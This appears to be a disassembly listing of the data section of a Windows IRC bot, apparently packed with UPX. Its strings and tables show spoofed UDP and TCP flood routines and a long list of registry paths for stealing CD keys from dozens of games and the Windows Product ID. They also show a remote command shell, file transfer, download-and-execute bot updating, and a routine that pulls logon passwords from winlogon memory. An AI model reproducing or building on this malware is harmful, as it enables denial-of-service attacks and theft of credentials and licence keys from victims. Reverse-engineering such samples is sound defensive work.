aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
unk_436414 db 2Dh ; - ; DATA XREF: sub_4137CD+4B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
unk_43643C db 2Dh ; - ; DATA XREF: sub_41386C+27D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
dword_43645C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_413B78+4F�o
aDoneWithFlood_ db '- Done with flood.',0
align 4
unk_43647C db 2Dh ; - ; DATA XREF: sub_413E36+4EB�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_4364CC db 2Dh ; - ; DATA XREF: sub_413E36+44F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_43651C db 2Dh ; - ; DATA XREF: sub_413E36+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
unk_43653C db 2Dh ; - ; DATA XREF: sub_413E36+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_436574 db 2Dh ; - ; DATA XREF: sub_413E36+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
unk_4365A8 db 2Dh ; - ; DATA XREF: sub_4143CC+66�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
unk_4365DC db 2Dh ; - ; DATA XREF: sub_4146CF+4D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
unk_43661C db 2Dh ; - ; DATA XREF: sub_414746+345�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
unk_4366A8 db 2Dh ; - ; DATA XREF: sub_414746+2F3�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
unk_43670C db 2Dh ; - ; DATA XREF: sub_414746+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
unk_436738 db 2Dh ; - ; DATA XREF: sub_414746+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
unk_43677C db 2Dh ; - ; DATA XREF: sub_414746+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 4
unk_4367CC db 2Dh ; - ; DATA XREF: sub_414746+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
unk_4367F8 db 2Dh ; - ; DATA XREF: sub_414A92+60�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 4
aSD db '%s%d ',0 ; DATA XREF: sub_414C2F+204�o
align 4
dword_43682C dd 202E6425h, 73253403h, 203D2003h, 73253703h, 3 ; DATA XREF: sub_415135+35�o
dword_436840 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415135+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_4151AD+60�o
align 4
dword_436878 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_41524D:loc_415282�o
dword_43688C dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_41524D+20�o
dword_4368A0 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h
; DATA XREF: sub_41528E+DC�o
dd 6574656Ch, 0
dword_4368BC dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_41528E+3F�o
dd 676E6974h, 0
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4153BD+11�o
aWindow db 'Window',0 ; DATA XREF: sub_4155F8+23�o
; sub_4157F1+26�o
align 4
dd 80000001h
off_4368EC dd offset aSoftwareValveC ; DATA XREF: sub_415A30+C�r
; sub_415A30+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_4368F8 dd 2 dup(0) ; DATA XREF: sub_415A30+26�o
dd 80000001h, 437A7Ch, 437A70h, 437A60h, 2 dup(0)
dd 80000001h, 437A40h, 437A3Ch, 437A28h, 2 dup(0)
dd 80000001h, 437A04h, 437A3Ch, 4379F8h, 2 dup(0)
dd 80000001h, 4379D4h, 4379CCh, 4379B8h, 2 dup(0)
dd 80000001h, 4379A4h, 437994h, 437978h, 2 dup(0)
dd 80000001h, 437934h, 437ABCh, 437920h, 2 dup(0)
dd 80000002h, 4378F4h, 4378E8h, 4378C8h, 2 dup(0)
dd 80000002h, 437894h, 437ABCh, 43787Ch, 2 dup(0)
dd 80000002h, 437848h, 437ABCh, 437830h, 2 dup(0)
dd 80000002h, 437818h, 437ABCh, 437800h, 2 dup(0)
dd 80000002h, 4377C4h, 43D808h, 4377B4h, 2 dup(0)
dd 80000002h, 43777Ch, 43D808h, 437768h, 2 dup(0)
dd 80000002h, 43771Ch, 43D808h, 4376FCh, 2 dup(0)
dd 80000002h, 4376ACh, 43D808h, 437680h, 2 dup(0)
dd 80000002h, 437644h, 43D808h, 437630h, 2 dup(0)
dd 80000002h, 4375F8h, 43D808h, 4375E8h, 2 dup(0)
dd 80000002h, 437598h, 43D808h, 43756Ch, 2 dup(0)
dd 80000002h, 43752Ch, 43D808h, 437510h, 2 dup(0)
dd 80000002h, 4374E0h, 43D808h, 4374C0h, 2 dup(0)
dd 80000002h, 437484h, 43D808h, 437470h, 2 dup(0)
dd 80000002h, 437428h, 43D808h, 437408h, 2 dup(0)
dd 80000002h, 4373B4h, 43D808h, 437384h, 2 dup(0)
dd 80000002h, 437334h, 43D808h, 437308h, 2 dup(0)
dd 80000002h, 4372C8h, 4372C0h, 4372A0h, 2 dup(0)
dd 80000002h, 43725Ch, 43D808h, 437240h, 2 dup(0)
dd 80000002h, 4371F4h, 43D808h, 4371D0h, 2 dup(0)
dd 80000002h, 43719Ch, 43D808h, 437190h, 2 dup(0)
dd 80000002h, 43715Ch, 43D808h, 437150h, 2 dup(0)
dd 80000002h, 43711Ch, 43D808h, 437110h, 2 dup(0)
dd 80000002h, 4370DCh, 43D808h, 4370D0h, 2 dup(0)
dd 80000002h, 437094h, 43D808h, 437080h, 2 dup(0)
dd 80000002h, 437044h, 43D808h, 437030h, 2 dup(0)
dd 80000002h, 437000h, 437ABCh, 436FE4h, 2 dup(0)
dd 80000002h, 436FC4h, 436FBCh, 436F98h, 2 dup(0)
dd 80000002h, 436F7Ch, 436FBCh, 436F5Ch, 2 dup(0)
dd 80000002h, 436F3Ch, 436FBCh, 436F18h, 2 dup(0)
dd 80000002h, 436F00h, 436FBCh, 436EFCh, 2 dup(0)
dd 80000002h, 436EE0h, 436ED0h, 436EC8h, 2 dup(0)
dd 80000002h, 436E94h, 42C914h, 436E7Ch, 2 dup(0)
dd 80000002h, 436E40h, 436E34h, 436E0Ch, 436DFCh, 436DE8h
dd 80000002h, 436DC4h, 436DB8h, 436DA4h, 436D94h, 436D8Ch
dd 80000002h, 436DC4h, 436DB8h, 436D60h, 436D94h, 436D58h
dd 80000002h, 436DC4h, 436DB8h, 436D28h, 436D94h, 436D20h
dd 6 dup(0)
dd 3379654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64726F48h, 6F207365h, 68742066h, 6E552065h
dd 64726564h, 296B7261h, 0
dd 3279654Bh, 3Dh, 6576654Eh, 6E697772h, 20726574h, 6867694Eh
dd 28207374h, 64616853h, 2073776Fh, 5520666Fh, 6572646Eh
dd 6469746Eh, 2965h, 3179654Bh, 3Dh, 636E776Eh, 79656B64h
dd 696E692Eh, 0
aNeverwinterNig db 'Neverwinter Nights',0
align 4
aLocation db 'Location',0
align 4
aSoftwareBiowar db 'Software\BioWare\NWN\Neverwinter',0
align 4
aMtkwftmkemfew3 db 'mtkwftmkemfew3p3b7',0
align 4
aBaseMpSof2key db 'base\mp\sof2key',0
aSoldierOfFortu db 'Soldier of Fortune II - Double Helix',0
align 4
aInstallpath db 'InstallPath',0
db 53h
aOftwareActivis db 'oftware\Activision\Soldier of Fortune II - Double Helix',0
align 4
aHiddenDangerou db 'Hidden & Dangerous 2',0
align 4
db 53h
aOftwareIllusio db 'oftware\Illusion Softworks\Hidden & Dangerous 2',0
align 4
aChrome db 'Chrome',0
align 10h
aSerialnumber db 'SerialNumber',0
align 10h
db 53h
aOftwareTechlan db 'oftware\Techland\Chrome',0
align 4
aNox db 'NOX',0
aSoftwareWestwo db 'Software\Westwood\NOX',0
align 4
aCommandAndConq db 'Command and Conquer: Red Alert 2',0
align 4
db 53h
aOftwareWestwoo db 'oftware\Westwood\Red Alert 2',0
align 4
aCommandAndCo_0 db 'Command and Conquer: Red Alert',0
align 4
db 53h
aOftwareWestw_0 db 'oftware\Westwood\Red Alert',0
aCommandAndCo_1 db 'Command and Conquer: Tiberian Sun',0
align 4
aSerial db 'Serial',0
align 4
db 53h
aOftwareWestw_1 db 'oftware\Westwood\Tiberian Sun',0
align 4
aRainbowSixIiiR db 'Rainbow Six III RavenShield',0
db 53h
aOftwareRedStor db 'oftware\Red Storm Entertainment\RAVENSHIELD',0
align 10h
aNascarRacing20 db 'Nascar Racing 2003',0
align 4
db 53h
aOftwareElectro db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2003\ergc',0
align 10h
aNascarRacing_0 db 'Nascar Racing 2002',0
align 4
db 53h
aOftwareElect_0 db 'oftware\Electronic Arts\EA Sports\Nascar Racing 2002\ergc',0
align 10h
aNhl2003 db 'NHL 2003',0
align 4
db 53h
aOftwareElect_1 db 'oftware\Electronic Arts\EA Sports\NHL 2003\ergc',0
align 10h
aNhl2002 db 'NHL 2002',0
align 4
db 53h
aOftwareElect_2 db 'oftware\Electronic Arts\EA Sports\NHL 2002\ergc',0
align 10h
aFifa2003 db 'FIFA 2003',0
align 4
db 53h
aOftwareElect_3 db 'oftware\Electronic Arts\EA Sports\FIFA 2003\ergc',0
align 10h
aFifa2002 db 'FIFA 2002',0
align 4
db 53h
aOftwareElect_4 db 'oftware\Electronic Arts\EA Sports\FIFA 2002\ergc',0
align 10h
aShogunTotalWar db 'Shogun: Total War: Warlord Edition',0
align 4
db 53h
aOftwareElect_5 db 'oftware\Electronic Arts\EA GAMES\Shogun Total War - Warlord Editi'
db 'on\ergc',0
align 10h
aNeedForSpeedUn db 'Need For Speed: Underground',0
db 53h
aOftwareElect_6 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Underground\ergc',0
align 10h
aNeedForSpeedHo db 'Need For Speed Hot Pursuit 2',0
align 10h
aErgc db 'ergc',0
align 4
db 53h
aOftwareElect_7 db 'oftware\Electronic Arts\EA GAMES\Need For Speed Hot Pursuit 2',0
align 4
aMedalOfHonorAl db 'Medal of Honor: Allied Assault: Spearhead',0
align 4
db 53h
aOftwareElect_8 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Sp'
db 'earhead\ergc',0
align 4
aMedalOfHonor_0 db 'Medal of Honor: Allied Assault: Breakthrough',0
align 4
db 53h
aOftwareElect_9 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault Br'
db 'eakthrough\ergc',0
align 4
aMedalOfHonor_1 db 'Medal of Honor: Allied Assault',0
align 4
db 53h
aOftwareElec_10 db 'oftware\Electronic Arts\EA GAMES\Medal of Honor Allied Assault\er'
db 'gc',0
align 10h
aGlobalOperatio db 'Global Operations',0
align 4
db 53h
aOftwareElec_11 db 'oftware\Electronic Arts\EA GAMES\Global Operations\ergc',0
align 10h
aCommandAndCo_2 db 'Command and Conquer: Generals',0
align 10h
db 53h
aOftwareElec_12 db 'oftware\Electronic Arts\EA GAMES\Generals\ergc',0
aJamesBond007Ni db 'James Bond 007: Nightfire',0
align 4
db 53h
aOftwareElec_13 db 'oftware\Electronic Arts\EA GAMES\James Bond 007 Nightfire\ergc',0
aCommandAndCo_3 db 'Command and Conquer: Generals (Zero Hour)',0
align 4
db 53h
aOftwareElec_14 db 'oftware\Electronic Arts\EA GAMES\Command and Conquer Generals Zer'
db 'o Hour\ergc',0
align 4
aBlackAndWhite db 'Black and White',0
db 53h
aOftwareElec_15 db 'oftware\Electronic Arts\EA GAMES\Black and White\ergc',0
align 10h
aBattlefieldVie db 'Battlefield Vietnam',0
db 53h
aOftwareElec_16 db 'oftware\Electronic Arts\EA GAMES\Battlefield Vietnam\ergc',0
align 10h
aBattlefield194 db 'Battlefield 1942 (Secret Weapons of WWII)',0
align 4
db 53h
aOftwareElec_17 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 Secret Weapons '
db 'of WWII\ergc',0
align 4
aBattlefield1_0 db 'Battlefield 1942 (Road To Rome)',0
db 53h
aOftwareElec_18 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942 The Road to Rom'
db 'e\ergc',0
align 4
aBattlefield1_1 db 'Battlefield 1942',0
align 4
db 53h
aOftwareElec_19 db 'oftware\Electronic Arts\EA GAMES\Battlefield 1942\ergc',0
aFreedomForce db 'Freedom Force',0
align 4
db 53h
aOftwareElec_20 db 'oftware\Electronic Arts\EA Distribution\Freedom Force\ergc',0
aIgi2CovertStri db 'IGI 2: Covert Strike',0
align 4
db 53h
aOftwareIgi2Ret db 'oftware\IGI 2 Retail',0
align 10h
aUnrealTourname db 'Unreal Tournament 2004',0
align 4
db 53h
aOftwareUnrealT db 'oftware\Unreal Technology\Installed Apps\UT2004',0
align 4
aUnrealTourna_0 db 'Unreal Tournament 2003',0
align 4
db 53h
aOftwareUnrea_0 db 'oftware\Unreal Technology\Installed Apps\UT2003',0
align 4
aMicrosoftWindo db 'Microsoft Windows Product ID',0
align 4
aProductid db 'ProductId',0
align 4
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion',0
align 10h
aSoldiersOfAnar db 'Soldiers Of Anarchy',0
aSoftwareSilver db 'Software\Silver Style Entertainment\Soldiers Of Anarchy\Settings',0
align 4
aLegendsOfMight db 'Legends of Might and Magic',0
align 4
aCustomernumber db 'CustomerNumber',0
align 4
aSoftware3d0Sta db 'Software\3d0\Status',0
aIndustryGiant2 db 'Industry Giant 2',0
align 4
aPrvkey db 'prvkey',0
align 4
aSoftwareJowood db 'Software\JoWooD\InstalledGames\IG2',0
align 4
aHalfLife db 'Half-Life',0
align 4
aSoftwareValveH db 'Software\Valve\Half-Life\Settings',0
align 4
aGunmanChronicl db 'Gunman Chronicles',0
align 4
aKey_0 db 'Key',0
aSoftwareValveG db 'Software\Valve\Gunman\Settings',0
align 10h
aTheGladiators db 'The Gladiators',0
align 10h
aRegnumber db 'RegNumber',0
align 4
aSoftwareEugenS db 'Software\Eugen Systems\The Gladiators',0
align 4
aCounterStrikeR db 'Counter-Strike (Retail)',0 ; DATA XREF: UPX0:004368F4�o
aCdkey db 'CDKey',0 ; DATA XREF: UPX0:004368F0�o
align 4
aSoftwareValveC db 'Software\Valve\CounterStrike\Settings',0 ; DATA XREF: UPX0:off_4368EC�o
align 4
asc_437AEC: ; DATA XREF: sub_415A30+E9�o
; sub_415A30+F4�o
unicode 0, <=>,0
dword_437AF0 dd 234032Dh, 656B6463h, 3027379h, 7325202Dh, 7325203Ah
; DATA XREF: sub_415A30+2B�o
dd 0
unk_437B08 db 2Dh ; - ; DATA XREF: sub_415C5A+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
unk_437B3C db 2Dh ; - ; DATA XREF: sub_415C5A+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 4
unk_437B6C db 2Dh ; - ; DATA XREF: sub_415C5A+47�o
; sub_415E1B+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 10h
dword_437B90 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_415E1B+362�o
; sub_4161BD+156�o
dd 726F72h
unk_437BA8 db 2Dh ; - ; DATA XREF: sub_415E1B+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
unk_437BD4 db 2Dh ; - ; DATA XREF: sub_415E1B+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_437BF8 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_415E1B+1CB�o
dd 74756Fh
dword_437C10 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_415E1B+16A�o
dd 169h
unk_437C28 db 2Dh ; - ; DATA XREF: sub_415E1B+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
unk_437C48 db 2Dh ; - ; DATA XREF: sub_415E1B+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_437C6C db 2Dh ; - ; DATA XREF: sub_415E1B+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_2 db '- failed to create socket',0
align 10h
unk_437C90 db 2Dh ; - ; DATA XREF: sub_4161BD+1D1�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 4
unk_437CBC db 2Dh ; - ; DATA XREF: sub_4161BD+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
unk_437CDC db 2Dh ; - ; DATA XREF: sub_4161BD+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_4161BD+97�o
unk_437D0C db 2Dh ; - ; DATA XREF: sub_4161BD+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 4
unk_437D3C db 2Dh ; - ; DATA XREF: sub_4163FA+493�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
unk_437D68 db 2Dh ; - ; DATA XREF: sub_4163FA+485�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 4
unk_437D9C db 2Dh ; - ; DATA XREF: sub_4163FA+3C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 10h
dword_437DE0 dd 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh
; DATA XREF: sub_4163FA+358�o
dd 25206465h, 73h
unk_437DFC db 2Dh ; - ; DATA XREF: sub_4163FA+2E1�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
unk_437E34 db 2Dh ; - ; DATA XREF: sub_4163FA+262�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
unk_437E5C db 2Dh ; - ; DATA XREF: sub_4163FA+1D8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
unk_437E88 db 2Dh ; - ; DATA XREF: sub_4163FA+195�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 10h
unk_437EB0 db 2Dh ; - ; DATA XREF: sub_4163FA+183�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
unk_437ED8 db 2Dh ; - ; DATA XREF: sub_4163FA+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_4169A2:loc_4169E5�o
; sub_418EF7+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_4169A2:loc_4169DF�o
aDisk db 'Disk',0 ; DATA XREF: sub_4169A2:loc_4169D9�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_4169A2:loc_4169D3�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_4169A2:loc_4169CD�o
align 4
off_437F28 dd offset word_4D4152 ; DATA XREF: sub_4169A2:loc_4169C7�o
word_437F2C dw 3Fh ; DATA XREF: sub_4169A2+1F�o
; sub_41AA43:loc_41AB45�r
align 10h
aFailed db 'failed',0 ; DATA XREF: sub_416A33:loc_416B11�o
; sub_416B57+3B�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_416A33+6C�o
align 10h
unk_437F40 db 2Dh ; - ; DATA XREF: sub_416B57+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
unk_437F7C db 2Dh ; - ; DATA XREF: sub_416B57+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
aA_1 db 'A:\',0 ; DATA XREF: sub_416C29:loc_416C6E�o
dword_437FBC dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_416CAE+C8�o
dd 64252064h, 6C696620h, 7365h
unk_437FDC db 2Dh ; - ; DATA XREF: sub_416CAE+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
dword_438004 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_416DC9+107�o
dd 73252064h, 73255Ch
dword_438020 dd 2A5C7325h, 0 ; DATA XREF: sub_416DC9+1A�o
unk_438028 db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417094�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
unk_43805C db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417067�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
unk_438088 db 2Dh ; - ; DATA XREF: sub_416F1B:loc_417060�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 10h
unk_4380C0 db 2Dh ; - ; DATA XREF: sub_416F1B+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
aUserdomain: ; DATA XREF: sub_416F1B+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_416F1B+CE�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_416F1B+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_416F1B+8D�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_416F1B+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_416F1B+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_416F1B+68�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_416F1B+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_416F1B+40�o
; sub_416F1B+161�o ...
align 4
unk_4381F8 db 2Dh ; - ; DATA XREF: sub_416F1B+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 4
aMsgina db 'MSGINA',0 ; DATA XREF: sub_4170ED+13E�o
align 10h
aNwgina db 'NWGINA',0 ; DATA XREF: sub_4170ED+123�o
align 4
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_4170ED+AF�o
align 4
dword_438244 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_417553+70�o
; sub_4175EA+C7�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 295325h
dword_438294 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 4C6E6957h
; DATA XREF: sub_4175EA+E1�o
dd 6E6F676Fh, 666E4920h, 616D726Fh, 6E6F6974h, 49502820h
dd 64252044h, 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah
dd 202C5325h, 65735502h, 203A0272h, 2F532528h, 412F4E28h
dd 2929h
off_4382E8 dd offset aQ ; DATA XREF: sub_417ADE+5C�r
; "q"
dd offset dword_438E90
dd offset aE ; "e"
dd offset aR ; "r"
dd offset aT ; "t"
dd offset dword_438E8C
dd offset aU ; "u"
dd offset aI ; "i"
dd offset aP ; "p"
dd offset aA ; "a"
dd offset aS_1 ; "s"
dd offset aD ; "d"
dd offset dword_438E88
dd offset dword_438E84
dd offset dword_438E80
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42CE54 ; "l"
